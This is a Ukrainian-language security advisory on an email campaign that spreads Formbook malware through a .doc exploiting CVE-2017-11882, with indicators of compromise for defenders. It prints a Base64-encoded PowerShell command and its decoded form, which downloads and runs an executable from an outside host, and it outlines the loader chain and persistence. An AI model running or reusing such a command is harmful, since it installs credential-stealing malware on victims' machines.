Чергова кампанія розсилання шкідливих електронних листів

Зафіксовано розсилання шкідливих електронних листів, що містять шкідливе вкладення типу .doc, яке експлуатує вразливість cve-2017-11882 для завантаження екземпляру шкідливого програмного забезпечення класу Formbook. Особливістю є використання багатоетапного завантаження з використанням публічного сервісу зберігання текстових даних pastebin.com, подібна техніка використовувалась раніше.
Зразок електронного повідомлення:

Детальний опис:
У вкладенні листів знаходиться rtf-документ RSEBBScan0023.doc, що містить вкладений OLE Object

при відкритті якого шляхом експлуатації вразливості #CVE-2017-11882 відбувається запуск EQNEDT32.exe та виконання вкладеного OLE Object, що містить команди для завантаження та виконання VBS сценарію.

Завантаження відбувається з публічного сервісу для зберігання даних у текстовому форматі - pastebin.com з використання протоколу https за посиланням
hxxps://pastebin.com/raw/232YvPmw (ip-адреса 104.20.209.21, порт 443)

За результатами виконання VBScript відбувається запуск powershell для завантаження шкідливого файлу, його збереження (C:\Users\user\AppData\Local\Temp\bakdraw.exe) та запуску.
Кодована в Base64 команда powershell:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop -w 1 -e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABlA
CgAIgBoAHQAdABwADoALwAvAG0AYQB0AHQAYwBhAHMALgBjAG8AbQAuAGgAawAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFIAZQBx
AHUAZQBzAHQAcwAvAEMAbwBvAGsAaQBlAC8ALgB0AGUAbQBwAC8AMAAzAC8AawBpAG4AZwAuAGUAeABlACIALAAiACQAZQBuAHYAOgB
0AGUAbQBwAFwAYgBhAGsAZAByAGEAdwAuAGUAeABlACIAKQApADsA
Декодована команда:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe –nop –w 1 iex ((new-object net.webclient).downloadfile("http://mattcas.com.hk/wp-includes/Requests/Cookie/.temp/03/king.exe","$env:temp\bakdraw.exe"));
Завантажений файл є запакованим зразком шкідливого програмного забезпечення типу Formbook, що на відміну від інших викрадачів, може отримати облікові дані авторизації з веб-форм до TLS шифрування, навіть якщо використовується віртуальна клавіатура, автоматичне заповнення або буфер обміну.
Завантажений файл перевіряє середовище виконання на предмет виявлення пісочниць та віртуальних середовищ, після чого відбувається ін'єкція шкідливого коду в один випадково вибраний службовий процес із каталогу System32.
Інфікований системний процес закріплюється в системі через гілку системного реєстру HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, проводить збір інформації та її збереження в каталозі %AppData% користувача, запускає та інфікує процес firefox.exe для збору інформації із нього, інфікує процес explorer.exe, що відправляє викрадені дані у зашифрованому вигляді на адреси С2-серверів через HTTP методом POST.
Рівень загрози: СЕРЕДНІЙ
Поштовий лист –> *.doc (rtf) –> EQNEDT32.exe –> GET URL(pastebin.com) -> powershell –> *.exe(FORMBOOK) –>Evader&Exploiter&Spyware

Механізм роботи:


Індикатори кіберзагроз:
IP адреса з якої проводиться розсилання
185.81.166.184
Main object - "RSEBBScan0023.doc"
sha256 42b6ae9716127e1bc219c3d19a3e43ffacbd974a111b8553fbf71f95b692e22d
sha1 1ece20615e66988cf706e99734190cab274335b7
md5 7639e2ab7b299c5a0f3da3f1d4f48446
Dropped object - "bakdraw.exe"
sha256 bee3e25367dae97e0889854b5dec10b8e7ca737923b351b8b08d7a9572127bc8
sha1 46c788841de65fa766e98b26dc52b3c59e6e6094
md5 4c18b86134e4ff08995423340cdce7b4
Dropped executable file
sha256 C:\Users\admin\AppData\Local\Temp\amorality.dll d6e566476f58d60c33e1942ec608df4d02b36b84b626281e18b78d4242d78df5
sha256 C:\Users\admin\AppData\Local\Temp\nsyE927.tmp\System.dll a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
DNS requests
domain pastebin.com
domain mattcas.com.hk
domain www.youxisousuo.com
domain www.roohosting.online
domain www.design-linkage.com
domain www.gianlucacolombo.net
domain www.wireboz.com
domain www.raspimania.net
domain www.mmweddingplanners.com
domain www.bulnitayiesfde.com
domain www.wauay.com
domain www.findinghearth.com
domain www.inside-net.com
domain www.new-and-recycled.com
domain www.anti3u.com
domain www.vdmoijrno.com
domain www.equifaxsecuriuy2017.com
domain www.dumb.ltd
domain www.eamrepp.com
domain www.tikiislandboats.com
domain www.anodistribution.com
domain www.youxisousuo.com
domain www.biesenbach.info
domain www.sohogreenbay.net
Connections
ip 104.20.209.21 download VBA script (Pastebin)
ip 58.82.193.216 dropped exe
ip 27.124.118.252 C2
ip 49.212.207.151 C2
ip 91.194.91.202 C2
ip 199.192.26.182 C2
ip 23.20.239.12 C2
ip 184.168.131.241 C2
ip 85.128.128.104 C2
ip 103.79.176.204 C2
ip 35.246.6.109 C2
ip 81.169.145.86 C2
HTTP/HTTPS requests
url hxxps://pastebin.com/raw/232YvPmw download VBA script from pastebin
url hxxp://mattcas.com.hk/wp-includes/Requests/Cookie/.temp/03/king.exe download exe
url hxxp://www.design-linkage.com/c190/?hBs=Y37ShsJ8b7VBoaTj30mIjDP/PwEL1jtRgEUZvJxkc66zU1vDDhCApAWOT/hIXtAWMmhFwQ==&mNYx=VZ4TBFeX&sql=1
url hxxp://www.roohosting.online/c190/?hBs=hd8Y8muCtEZhCv8ALKPgHK95tYDhYYDxelL8xD4S8O0L500na6sRHMWWvR9un0dmK2fFsA==&mNYx=VZ4TBFeX
url hxxp://www.design-linkage.com/c190/
url hxxp://www.gianlucacolombo.net/c190/?hBs=wcRGop6P8GSyN0OG59L6Y2jBJcUgFYPG3McKEZTQYlaCAyMeNVJJkEAIn7SvAC160HeFeQ==&mNYx=VZ4TBFeX&sql=1
url hxxp://www.wireboz.com/c190/
url hxxp://www.gianlucacolombo.net/c190/
url hxxp://www.wireboz.com/c190/?hBs=9rjFNiSZVcAsmJ12JlslYLNxXAMC+A9esWaGRjTWwv1KaJGYIPyYrbZMaSQCjjD+4j9nKg==&mNYx=VZ4TBFeX
url hxxp://www.findinghearth.com/c190/?hBs=pQERSKm9xYRn1wJK+q6TaJUR9sxws8FoYF86g/ZBrtFE+MUdAxh2xelEHvS2+N5m/pDLEg==&mNYx=VZ4TBFeX
url hxxp://www.mmweddingplanners.com/c190/
url hxxp://www.mmweddingplanners.com/c190/?hBs=COY46yMI64czqhsWaiuV9snNklVjvOR8AbbkzQrTt7Yl0nF6lhUnyncVRFvVA2m+x9mVIQ==&mNYx=VZ4TBFeX
url hxxp://www.findinghearth.com/c190/
url hxxp://www.wauay.com/c190/
url hxxp://www.wauay.com/c190/?hBs=hdSc+6cz5u+gM7q0VCz/gch1W0/VbR1qPmQIwQLLDhu9MpHkAdUUXwodWFRSZE+NsgBSvQ==&mNYx=VZ4TBFeX
url hxxp://www.inside-net.com/c190/
url hxxp://www.inside-net.com/c190/?hBs=nbd7RvCkAbgr71l/8tzH87GscRMbBlQqpVoYVbI4/nCNHs8Lcc3m03B5hNXwZmv8M5gMtw==&mNYx=VZ4TBFeX
url hxxp://www.tikiislandboats.com/c190/?WPxD=0MymhALoOQ1QDNcOOK0FVhUWdWUfiFJrsaZqzo++8O4GDfBNyg6jxOS3DKmUppslZ42eJA==&JfG=THihBDzHqn&sql=1
url hxxp://www.tikiislandbo
ats.com/c190/
url hxxp://www.biesenbach.info/c190/
url hxxp://www.biesenbach.info/c190/?WPxD=HRlbi4UKosc5CregBZJcdIO8cq+rWo0rKZXze6if5j9RUlHiN/MIGfpRZ5voGqvOF7aEIA==&JfG=THihBDzHqn&sql=1
Registry
Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Name Z8LPCTBPGJX
Value C:\Program Files\Nbrk\autochkxbjhankh.exe